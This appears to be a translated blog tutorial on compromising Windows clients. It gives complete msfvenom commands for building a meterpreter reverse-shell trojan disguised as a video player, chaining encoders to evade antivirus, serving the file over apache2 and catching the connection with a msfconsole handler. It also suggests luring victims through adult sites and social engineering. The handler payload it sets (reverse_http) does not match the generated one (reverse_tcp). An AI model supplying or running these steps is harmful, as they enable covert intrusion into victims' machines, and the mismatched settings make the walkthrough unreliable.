Penetration based on Windows client

Principle of Client Penetration

When we cannot break through the other party's network boundary, we often have to fall back on client-side penetration to reach the target: for example, we send the target a program containing a backdoor, or a Word document or PDF file that carries one. For this to work, social engineering is also needed to lure the victim into executing the malicious program.

Since the target will have anti-virus software installed, we either lure the victim through adult-content websites or rely on AV evasion (免杀, literally "avoid killing") so that the program is not detected.

AV evasion can be achieved by modifying the binary's characteristic (signature) bytes or by encrypting the payload.

Hands-on

Making Windows Malware Get a Shell

msfvenom combines the former msfpayload and msfencode. With msfvenom we can generate a Trojan program; once it is executed on the target machine, it connects back to a listener running on our own machine.

Generate the xx video.exe backdoor program

Use one encoder

Command: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.139.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/xx影音1.exe

Use two encoders chained together to further improve evasion

Command: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/xx影音2.exe

Parameter description

-a specifies the architecture, e.g. x86 or x64; x86 means 32-bit and x64 means 64-bit.

--platform specifies the target platform; here we choose windows. All supported platforms can be listed with -l platforms.

-p sets the attack payload.

-b lists the bad characters to exclude from the output; such bytes (here \x00) would prevent the payload from executing correctly.

Start apache2

Command: systemctl start apache2

On the target machine, browse to the web server, click the file to download it, and open it.


Go back to Kali and start the listener

Command: msfconsole

Enter the multi/handler module


Set the payload

Command: set payload windows/meterpreter/reverse_http


Set the listener options used to receive the reverse shell from the target machine


Start the attack

Command: run



Source: blog.csdn.net/qq_62803993/article/details/128766228